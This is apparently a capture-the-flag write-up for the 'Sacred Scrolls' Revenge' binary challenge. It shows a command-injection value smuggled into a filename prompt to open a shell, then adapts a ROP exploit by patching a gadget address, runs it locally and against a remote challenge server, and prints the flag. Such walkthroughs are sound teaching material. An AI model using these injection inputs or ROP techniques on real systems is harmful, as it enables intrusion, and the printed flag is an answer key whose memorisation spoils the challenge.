Sacred Scrolls' Revenge
4 minutes to read
This challenge is a fixed version of Sacred Scrolls. Almost all the program behavior is the same as in the previous version, so read that writeup before this one.
They fixed the challenge due to an unintended solution (command injection):
$ ./sacred_scrolls
ββββββββ
β β β β β βββββββββ βββ
ββ β β β β β β β β β β βββ ββββββββ βββββ β
ββββββββββ β β βββ
β β β β ββββββββββββ β β β β βββ
β ββ β β β β ββ βββββββ β β β βββββ
β ββββββ β β β β β β ββββββ
β ββββββ β ββ ββ ββ ββββββββ
β β β β βββββββ β β β ββ β ββββββββββββ
β βββββββββ β β β ββββββ βββββββββββ
β ββββββββββ ββ βββββββββββββββββ
ββ ββββββββββββ ββ β β ββ ββββββββββββββ
ββββββββββ ββββ β β β β ββ βββββββββββ β
ββββββββββββ β β β ββ ββββββββββββ
βββββββ βββ ββ β ββ ββ βββββββββββββ β β β β
βββββββββ ββββ βββ ββ βββββββββββ β β β
βββ ββββββ ββ ββ ββββββββββββββ ββ
β ββββββββ ββββββββββββββββ β β β β
βββ β ββββββββββββββββββ β β β β
βββββββββββββββββββββ β β
β ββββββββββββββββββ β β β ββ β
βββββββββββββββ β β β β β
ββββββββββββ β β
ββββββββ β β ββ β β
β β ββ β β β ββ
β β
[+] All β
β β β³ β³ β
have been whiped out..
Enter your wizard tag: asdf
Interact with magic library asdf
1. Upload β
β β β³ β³
2. Read β
β β β³ β³
2. Cast β
β β β³ β³
3. Leave
>> 1
[*] Enter file (it will be named spell.zip): '; /bin/sh; echo '
$ ls
glibc sacred_scrolls sacred_scrolls_revenge solve.py
Trying the previous exploit
Let’s try to run the previous exploit on the updated program:
$ md5sum sacred_scrolls*
33c5fddcfed4332d797e7f2f5d74e75f sacred_scrolls
c4e656f3ecaa810d7d3e7c83922eff13 sacred_scrolls_revenge
$ cp solve.py solve_revenge.py
$ sed -i s/sacred_scrolls/sacred_scrolls_revenge/g solve_revenge.py
$ python3 solve_revenge.py
[*] './sacred_scrolls_revenge'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
RUNPATH: b'./glibc/'
[+] Starting local process './sacred_scrolls_revenge': pid 3933065
[*] "/bin/sh" address: 0x7fca52de9698
adding: spell.txt (deflated 54%)
[*] Switching to interactive mode
[-] This spell is not quiet effective, thus it will not be saved!
[*] Got EOF while reading in interactive
$
And it doesn’t work… At least, it seems that the address of "/bin/sh"
is still there.
Fixing the exploit
One thing to take into account is that the address of pop rdi; ret
and the address of system@plt
have probably changed:
$ ROPgadget --binary sacred_scrolls | grep 'pop rdi'
0x0000000000401183 : pop rdi ; ret
$ ROPgadget --binary sacred_scrolls_revenge | grep 'pop rdi'
0x00000000004011b3 : pop rdi ; ret
$ objdump -M intel -d sacred_scrolls | grep system
0000000000400820 <system@plt>:
400820: ff 25 6a 27 20 00 jmp QWORD PTR [rip+0x20276a] # 602f90 <system@GLIBC_2.2.5>
400a28: e8 f3 fd ff ff call 400820 <system@plt>
400a34: e8 e7 fd ff ff call 400820 <system@plt>
400c6c: e8 af fb ff ff call 400820 <system@plt>
400cfb: e8 20 fb ff ff call 400820 <system@plt>
$ objdump -M intel -d sacred_scrolls_revenge | grep system
0000000000400820 <system@plt>:
400820: ff 25 6a 27 20 00 jmp QWORD PTR [rip+0x20276a] # 602f90 <system@GLIBC_2.2.5>
400a28: e8 f3 fd ff ff call 400820 <system@plt>
400a34: e8 e7 fd ff ff call 400820 <system@plt>
400c9a: e8 81 fb ff ff call 400820 <system@plt>
400d29: e8 f2 fa ff ff call 400820 <system@plt>
Indeed, the gadget addresses are different. Let’s update this value and run the exploit again:
$ sed -i s/401183/4011b3/g solve_revenge.py
$ python3 solve_revenge.py
[*] './sacred_scrolls_revenge'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
RUNPATH: b'./glibc/'
[+] Starting local process './sacred_scrolls_revenge': pid 3934860
[*] "/bin/sh" address: 0x7f1196b16698
adding: spell.txt (deflated 54%)
[*] Switching to interactive mode
[-] This spell is not quiet effective, thus it will not be saved!
$ ls
glibc sacred_scrolls_revenge solve_revenge.py spell.zip
sacred_scrolls solve.py spell.txt
There we have it.
Flag
So, let’s try remotely:
$ python3 solve_revenge.py 178.62.5.219:32580
[*] './sacred_scrolls_revenge'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
RUNPATH: b'./glibc/'
[+] Opening connection to 178.62.5.219 on port 32580: Done
[*] "/bin/sh" address: 0x7fc46b11f698
updating: spell.txt (deflated 54%)
[*] Switching to interactive mode
[-] This spell is not quiet effective, thus it will not be saved!
$ ls
flag.txt
glibc
sacred_scrolls
spell.txt
spell.zip
$ cat flag.txt
HTB{m4y_th3_b0y_wh0_l1v3d_h3lp_u}